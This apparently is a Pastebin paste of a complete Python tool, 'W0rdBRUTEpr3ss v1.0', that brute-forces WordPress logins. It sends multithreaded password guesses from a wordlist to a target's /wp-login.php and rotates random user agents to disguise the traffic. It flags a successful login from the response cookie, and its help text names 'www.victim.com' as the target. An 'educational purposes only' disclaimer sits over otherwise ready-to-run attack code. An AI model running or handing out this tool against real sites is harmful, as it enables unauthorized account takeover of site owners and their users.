Googleinurl

[SCRIPT] W0rdBRUTEpr3ss v1.0

Dec 11th, 2014
1,150
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python
  2. #
  3. # WordPress Brute Force by Claudio Viviani
  4. #
  5. # Inspired by xSecurity's WordPress Brute Muliththreading
  6. #
  7. # Tested on Wordpress 3.x and 4.x
  8. #
  9. # Disclaimer:
  10. #
  11. # This exploit is intended for educational purposes only and the author
  12. # can not be held liable for any kind of damages done whatsoever to your machine,
  13. # or damages caused by some other,creative application of this exploit.
  14. # In any case you disagree with the above statement,stop here.
  15. #
  16. # Requirements:
  17. #
  18. # 1) python's httplib2 lib
  19. #    Installation: pip install httplib2
  20. #
  21. # Features:
  22. #
  23. # 1) Multithreading
  24. # 2) http and https protocols
  25. # 3) Random User Agent
  26.  
  27. import urllib, httplib, httplib2
  28. import socket, sys, os, os.path, optparse, random
  29. from threading import Thread
  30. from time import sleep
  31.  
  32. banner = """
  33.  ___ ___               __                                          
  34. |   Y   .-----.----.--|  .-----.----.-----.-----.-----.            
  35. |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|__ --|            
  36. |. / \ |_____|__| |_____|   __|__| |_____|_____|_____|            
  37. |:      |                |__|                                      
  38. |::.|:. |                                                          
  39. `--- ---'                                                          
  40.        _______            __         _______                      
  41.       |   _   .----.--.--|  |_.-----|   _   .-----.----.----.-----.
  42.       |.  1   |   _|  |  |   _|  -__|.  1___|  _  |   _|  __|  -__|
  43.       |.  _   |__| |_____|____|_____|.  __) |_____|__| |____|_____|
  44.       |:  1    \                   |:  |                          
  45.       |::.. .  /                    |::.|                          
  46.       `-------'                     `---'                          
  47.  
  48.                                        W0rdBRUTEpr3ss v1.0
  49.  
  50.                         Written by:
  51.  
  52.                       Claudio Viviani
  53.  
  54.                    http://www.homelab.it
  55.  
  56.                       info@homelab.it
  57.                   homelabit@protonmail.ch
  58.  
  59.               https://www.facebook.com/homelabit
  60.                 https://twitter.com/homelabit
  61.               https://plus.google.com/+HomelabIt1/
  62.     https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
  63. """
  64. def randomAgentGen():
  65.  
  66.  userAgent =    ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  67.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  68.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4',
  69.                 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  70.                 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
  71.                 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
  72.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0',
  73.                 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  74.                 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
  75.                 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
  76.                 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
  77.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0',
  78.                 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  79.                 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  80.                 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
  81.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  82.                 'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
  83.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
  84.                 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
  85.                 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
  86.                 'Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0',
  87.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  88.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
  89.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  90.                 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53',
  91.                 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  92.                 'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
  93.                 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
  94.                 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
  95.                 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
  96.                 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',
  97.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4',
  98.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2',
  99.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46',
  100.                 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)',
  101.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  102.                 'Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0',
  103.                 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
  104.                 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
  105.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10',
  106.                 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',
  107.                 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
  108.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4',
  109.                 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36',
  110.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4',
  111.                 'Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
  112.                 'Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53',
  113.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  114.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  115.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',
  116.                 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0',
  117.                 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53',
  118.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9',
  119.                 'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
  120.                 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53',
  121.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0',
  122.                 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0',
  123.                 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  124.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0',
  125.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',
  126.                 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
  127.                 'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0',
  128.                 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
  129.                 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
  130.                 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0',
  131.                 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
  132.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  133.                 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53',
  134.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
  135.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko/20100101 Firefox/31.0',
  136.                 'Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0',
  137.                 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36',
  138.                 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
  139.                 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  140.                 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
  141.                 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36',
  142.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0',
  143.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3',
  144.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36']
  145.  
  146.  UA = random.choice(userAgent)
  147.  return UA
  148.  
  149. def urlCMS(url):
  150.     if url[:8] != "https://" and url[:7] != "http://":
  151.         print('[X] You must insert http:// or https:// procotol')
  152.         os._exit(1)
  153.     # Page login
  154.     url = url+'/wp-login.php'
  155.     return url
  156.  
  157. def bodyCMS(username,pwd):
  158.     body = { 'log':username,
  159.     'pwd':pwd,
  160.     'wp-submit':'Login',
  161.     'testcookie':'1' }
  162.     return body
  163.  
  164.  
  165. def headersCMS(UA):
  166.     headers = { 'User-Agent': UA,
  167.                 'Content-type': 'application/x-www-form-urlencoded',
  168.                 'Cookie': 'wordpress_test_cookie=WP+Cookie+check' }
  169.     return headers
  170.  
  171. def responseCMS(response):
  172.     if response['set-cookie'].split(" ")[-1] == "httponly":
  173.         return "1"
  174.  
  175. def connection(url,user,password,UA,timeout):
  176.  
  177.     username = user
  178.     pwd = password
  179.  
  180.     http = httplib2.Http(timeout=timeout, disable_ssl_certificate_validation=True)
  181.    
  182.     # HTTP POST Data
  183.     body = bodyCMS(username,pwd)
  184.  
  185.     # Headers
  186.     headers = headersCMS(UA)
  187.  
  188.     try:
  189.         response, content = http.request(url, 'POST', headers=headers, body=urllib.urlencode(body))
  190.  
  191.         if str(response.status)[0] == "4" or str(response.status)[0] == "5":
  192.             print('\n[X] HTTP error, code: '+str(response.status))
  193.             os._exit(1)
  194.  
  195.         if responseCMS(response) == "1":
  196.             print('\n')
  197.             print('[!] Password FOUND!!!')
  198.             print('')
  199.             print('[!] Username: '+user+' Password: '+password)
  200.             os._exit(0)
  201.  
  202.     except socket.timeout:
  203.         print('\n[X] Connection Timeout')
  204.         os._exit(1)
  205.     except socket.error:
  206.          print('\n[X] Connection Refused')
  207.          os._exit(1)
  208.     except httplib.ResponseNotReady:
  209.         print('\n[X] Server Not Responding')
  210.         os._exit(1)
  211.     except httplib2.ServerNotFoundError:
  212.         print('\n[X] Server Not Found')
  213.         os._exit(1)
  214.     except httplib2.HttpLib2Error:
  215.         print('\n[X] Connection Error!!')
  216.         os._exit(1)
  217.  
  218. commandList = optparse.OptionParser('usage: %prog -t TARGET_URL -u USER -w WORDLIST_FILE [-p PORT] [--timeout sec]\n')
  219. commandList.add_option('-t', '--target',
  220.                   action="store",
  221.                   help="Insert URL: http[s]://www.victim.com",
  222.                   )
  223. commandList.add_option('-u', '--username',
  224.                   action="store",
  225.                   help="Insert username",
  226.                   )
  227.  
  228. commandList.add_option('-w', '--wordfilelist',
  229.                   action="store",
  230.                   help="Insert wordlist files",
  231.                   )
  232. commandList.add_option('-p', '--port',
  233.                   action="store",
  234.                   default=0,
  235.                   type="int",
  236.                   help="[Insert Port Number] - Default 80 or 443",
  237.                   )
  238. commandList.add_option('--timeout',
  239.                   action="store",
  240.                   default=10,
  241.                   type="int",
  242.                   help="[Timeout Value] - Default 10",
  243.                   )
  244.  
  245. options, remainder = commandList.parse_args()
  246.  
  247. # Check args
  248. if not options.target or not options.username or not options.wordfilelist:
  249.     print(banner)
  250.     print
  251.     commandList.print_help()
  252.     sys.exit(1)
  253.  
  254. # args to vars
  255. url = options.target
  256. user = options.username
  257. password = options.wordfilelist
  258. timeout = options.timeout
  259.  
  260.  
  261. # Check if Wordlist file exists and has readable
  262. if not os.path.isfile(password) and not os.access(password, os.R_OK):
  263.     print "[X] Wordlist file is missing or is not readable"
  264.     sys.exit(1)
  265.  
  266. # Open and read Wordlist file
  267. wordlist = open(password).read().split("\n")
  268. # Total lines (password) in Wordlist file
  269. totalwordlist = len(wordlist)
  270. # Gen Random UserAgent
  271. UA  = randomAgentGen()
  272. # Url to url+login_cms_page
  273. url = urlCMS(url)
  274.  
  275. print(banner)
  276. print
  277. print('[+] Target.....: '+options.target)
  278. print('[+] Wordlist...: '+str(totalwordlist))
  279. print('[+] Username...: '+user)
  280. print('[+]')
  281. print('[+] Connecting.......')
  282. print('[+]')
  283.  
  284. # Reset var for "progress bar"
  285. count = 0
  286.  
  287. threads = []
  288. for pwd in wordlist:
  289.     count += 1
  290.     t = Thread(target=connection, args=(url,user,pwd,UA,timeout))
  291.     t.start()
  292.     threads.append(t)
  293.     sys.stdout.write('\r')
  294.     sys.stdout.write('[+] Password checked: '+str(count)+'/'+str(totalwordlist))
  295.     sys.stdout.flush()
  296.     sleep(0.210)
  297.  
  298. for a in threads:
  299.     a.join()
  300.  
  301. # no passwords found
  302. print('\n[X] Password NOT found :(')
RAW Paste Data